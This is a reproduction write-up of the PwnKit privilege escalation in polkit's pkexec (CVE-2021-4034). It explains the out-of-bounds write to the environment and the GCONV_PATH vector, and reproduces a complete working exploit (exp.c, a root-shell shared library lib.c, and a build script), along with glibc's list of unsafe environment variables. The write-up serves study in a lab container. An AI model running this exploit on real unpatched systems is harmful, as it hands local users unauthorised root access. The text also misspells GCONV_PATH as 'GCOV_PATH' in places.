Reproduction of CVE-2021-4034

Background

The reason of reproducing this vulnerability is because this vulnerability is quite interesting – it takes the advantage of out range writing and make it as a vector to do priviledge escalation.

Moreover, after reading some articles, two questions remain in my mind:

Why can’t we set LD_PRELOAD to do the command execution? Many attackers use such way to bypass disabled function for PHP.
If LD_PRELOAD cannot, why GCOV_PATH can? Why other sensitive environment var cannot be used? What is the unique points of it?

Though a few articles do touch the surface of these two questions, none of them give a comprehension answer.

Therefore, with these two questions in my mind, I start my journey to reproduce this vulnerability.

Reproduction Environment

There is an exisiting docker image for this issue created by “chenaotian”. https://hub.docker.com/r/chenaotian/cve-2021-4034

Therefore, we can use it directly.

docker run -d -ti --rm -h cvedebug --name cvedebug --cap-add=SYS_PTRACE chenaotian/cve-2021-4034:latest /bin/bash

docker exec -it cvedebug /bin/bash

cd ~

ls

What good about this image is that it also contains debuger.

Vulnerability Analysis

Many articles do a great job for this part. I will go over this again in the most straightforward way.

“pkexec allows an authorized user to execute PROGRAM as another user. If username is not specified, then the program will be executed as the administrative super user, root.”

pkexec has its SUID bit set.

The logic to process parameter starts from line 533

https://github.com/wingo/polkit/blob/master/src/programs/pkexec.c

the n is initialized as 1 and program uses argv[n] to fetch the first arguements.

It is a common way to do so because argv[0] is “pkexec” itself when pkexec is initated in the termnial.

gdb /usr/local/bin/pkexec

Reading symbols from /usr/local/bin/pkexec...done.
pwndbg> b main
Breakpoint 1 at 0x1fb0: file pkexec.c, line 387.

pwndbg> r

|---------+---------+-----+------------|---------+---------+-----+------------|
| argv[0] | argv[1] | ... | argv[argc] | envp[0] | envp[1] | ... | envp[envc] |
|----|----+----|----+-----+-----|------|----|----+----|----+-----+-----|------|
     V         V                V           V         V                V
 "program" "-option"           NULL      "value" "PATH=name"          NULL

This time, though argv[1] is already out of bound, it does not point to anything meaningful. Another noticeable observation is that argv[argc+1] is the posititon of environment vars.

This also can be proved by the source code of execve()

// linux5.4/fs/binfmt_elf.c:
163 static int
164 create_elf_tables(struct linux_binprm *bprm, struct elfhdr *exec,
165         unsigned long load_addr, unsigned long interp_load_addr)
166 {
...
284     sp = STACK_ADD(p, ei_index);
...

306     /* Now, let's put argc (and argv, envp if appropriate) on the stack */
    // argc enters the stack
307     if (__put_user(argc, sp++))
308         return -EFAULT;
309
    // argvs enter the attack 
310     /* Populate list of argv pointers back to argv strings. */
311     p = current->mm->arg_end = current->mm->arg_start;
312     while (argc-- > 0) {
313         size_t len;
314         if (__put_user((elf_addr_t)p, sp++))
315             return -EFAULT;
316         len = strnlen_user((void __user *)p, MAX_ARG_STRLEN);
317         if (!len || len > MAX_ARG_STRLEN)
318             return -EINVAL;
319         p += len;
320     }
        // argv null enters
321     if (__put_user(0, sp++))
322         return -EFAULT;
323     current->mm->arg_end = p;
324
        // env enters
325     /* Populate list of envp pointers back to envp strings. */
326     current->mm->env_end = current->mm->env_start = p;
327     while (envc-- > 0) {
328         size_t len;
329         if (__put_user((elf_addr_t)p, sp++))
330             return -EFAULT;
331         len = strnlen_user((void __user *)p, MAX_ARG_STRLEN);
332         if (!len || len > MAX_ARG_STRLEN)
333             return -EINVAL;
334         p += len;
335     }
        // env null enters
336     if (__put_user(0, sp++))
337         return -EFAULT;\
...
}

While what if the pkexec is executed by execve() and explicitly set the argv to (char**){NULL}?

The answer is the argc will become 0 and argv[1] will point to environment vars (and argv[0] is NULL).

On line 609, path is assigned as the value of argv[1] which is actually envp[0].

On line 631, s is assigned with the absoulute path of path in the PATH, which is found by the name

The g_find_program_in_path’s definition can be found https://fossies.org/dox/pkg-config-0.29.2/gutils_8c_source.html#l00298

On line 638, argv[1], which is envp[0], is written by s

Therefore, we are able to write a new temp environment varaible.

From Qualys:

If our PATH environment variable is “PATH=name”, and if the directory “name” exists (in the current working directory) and contains an executable file named “value”, then a pointer to the string “name/value” is written out-of-bounds to envp[0];

If our PATH is “PATH=name=.”, and if the directory “name=.” exists and contains an executable file named “value”, then a pointer to the string “name=./value” is written out-of-bounds to envp[0].
https://blog.qualys.com/vulnerabilities-threat-research/2022/01/25/pwnkit-local-privilege-escalation-vulnerability-discovered-in-polkits-pkexec-cve-2021-4034

An example will be

# Before execution, create a directory "ABC\=."
# then create a file called "test" inside of the direcotry
# 
char *a_argv[]={ NULL };
char *a_envp[]={
        "test",
        "PATH=ABC=.",
        NULL
    };
execve("/usr/bin/pkexec", a_argv, a_envp);

According to the above logic, envp[0] will become ABC=./test

What’s the point to spend lots of time to inject a environment var?

Why cannot we just pass in our crafted environment var when do execve()?

This is because the dynamic linker ld-linux-x86-64.so.2 will clean the sensitive environment vars.

# _dl_non_dynamic_init: glibc-2.27/elf/dl-support.c : 307

void
_dl_non_dynamic_init (void)
{
  ··· ···
  ··· ···

  if (__libc_enable_secure) //when SUID set
    {
      static const char unsecure_envvars[] =
	UNSECURE_ENVVARS
#ifdef EXTRA_UNSECURE_ENVVARS
	EXTRA_UNSECURE_ENVVARS
#endif
	;
      const char *cp = unsecure_envvars;

      //(unset all unsecured envvars)
      while (cp < unsecure_envvars + sizeof (unsecure_envvars)) 
	{
	  __unsetenv (cp);
	  cp = (const char *) __rawmemchr (cp, '\0') + 1;
	}

#if !HAVE_TUNABLES
      if (__access ("/etc/suid-debug", F_OK) != 0)
	__unsetenv ("MALLOC_CHECK_");
#endif
    }
··· ···
··· ···
}

# glibc-2.27/sysdeps/generic/unsecvars.h : 10

#define GLIBC_TUNABLES_ENVVAR "GLIBC_TUNABLES\0"
#define UNSECURE_ENVVARS \
  "GCONV_PATH\0"							      \
  "GETCONF_DIR\0"							      \
  GLIBC_TUNABLES_ENVVAR							      \
  "HOSTALIASES\0"							      \
  "LD_AUDIT\0"								      \
  "LD_DEBUG\0"								      \
  "LD_DEBUG_OUTPUT\0"							      \
  "LD_DYNAMIC_WEAK\0"							      \
  "LD_HWCAP_MASK\0"							      \
  "LD_LIBRARY_PATH\0"							      \
  "LD_ORIGIN_PATH\0"							      \
  "LD_PRELOAD\0"							      \
  "LD_PROFILE\0"							      \
  "LD_SHOW_AUXV\0"							      \
  "LD_USE_LOAD_BIAS\0"							      \
  "LOCALDOMAIN\0"							      \
  "LOCPATH\0"								      \
  "MALLOC_TRACE\0"							      \
  "NIS_PATH\0"								      \
  "NLSPATH\0"								      \
  "RESOLV_HOST_CONF\0"							      \
  "RES_OPTIONS\0"							      \
  "TMPDIR\0"								      \
  "TZDIR\0"

Exploit

The g_printerr() function is used several times in pkexec. If the environment variable CHARSET is not UTF-8, g_printerr() will call glibc’s function iconv_open() to convert the message from UTF-8 to another format.

The iconv_open() function requests a conversion descriptor that converts the sequence of characters from encoding fromcode to encoding tcode. The conversion descriptor contains the conversion status. for each character set is stored in a .so file. Then follow the instructions in the gconv-modules file to link to the .so file corresponding to the parameter to perform the specific operation. If the environment variable GCONV_PATH is present, the iconv_open() function finds the gconv-modules file according to GCONV_PATH, and the subsequent operations remain unchanged.

Therefore, the rest of thing is to find a way to trigger iconv_open()

Fortunately, there is a process called “validate_environment_varaible”

So we can see if one of the varaible key is called “SHELL” or “XAUTHORITY”, g_printerr() will be triggered.

Knowing all above, the following exp will be easy to understand:

(codes are from https://github.com/chenaotian/CVE-2021-4034)

# exp.c

#include <stdio.h>
#include <unistd.h>

int main(int argc, char **argv)
{
        char * const a_argv [] = { NULL};
        char * const a_envp[] = {
                "pwnkitdir",
                "PATH=GCONV_PATH=.",
                "CHARSET=PWNKIT",
                "SHELL=xxx",
                NULL
        };
        execve("/usr/local/bin/pkexec", a_argv, a_envp);
}

# lib.c

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

static void __attribute__ ((constructor)) exp(void);
static void exp(void)
{
        setuid(0); seteuid(0); setgid(0); setegid(0);
        static char *a_argv[] = { "sh", NULL };
        static char *a_envp[] = { "PATH=/bin:/usr/bin:/sbin", NULL };
        execve("/bin/sh", a_argv, a_envp);
}

# run.sh

mkdir 'GCONV_PATH=.'
touch 'GCONV_PATH=./pwnkitdir'
chmod 777 'GCONV_PATH=./pwnkitdir'
mkdir pwnkitdir
touch pwnkitdir/gconv-modules
echo "module UTF-8// PWNKIT// pwnkit 1" >> pwnkitdir/gconv-modules
gcc -fPIC -shared lib.c -o pwnkitdir/pwnkit.so
gcc exp.c -o exp

Answsers to First Two Questions

During the journey of reproduction, I do found the answers to the first two questions.

Why can’t we set LD_PRELOAD to do the command execution? Many attackers use such way to bypass disabled function for PHP.

This is because LD_PRELOAD only takes effect before programs execution. Since the pkexec’s vulnerability is in main method, resetting LD_PRELOAD will not change dynamic linker.

Why it is useful for PHP? This is because many PHP functions fork new process and it is during the fork process that LD_PRELOAD takes effect (because child process inherites pararent’s environment).

If LD_PRELOAD cannot, why GCOV_PATH can? Why other sensitive environment var cannot be used? What is the unique points of it?

The reason why GCOV_PATH can is illustrated in the exploit section – icov_open() will use this path to find .so file.

Why it seems to be the only vector in all exploits?

This is because on line 701, environment is sanitized. So the attack must be happen before line 701 and after line 638 (where the environment is modified). It is a small range so probabaly GCOV_PATH is the only chance to hijack.

References

https://github.com/chenaotian/CVE-2021-4034
https://xz.aliyun.com/t/10905
https://saucer-man.com/information_security/876.html
https://github.com/wingo/polkit/blob/master/src/programs/pkexec.c
https://www.yijinglab.com/specialized/20220222150802
https://blog.qualys.com/vulnerabilities-threat-research/2022/01/25/pwnkit-local-privilege-escalation-vulnerability-discovered-in-polkits-pkexec-cve-2021-4034
http://blog.gamous.cn/post/cve-2021-4034/
https://www.iceswordlab.com/2022/02/10/CVE-2021-4034/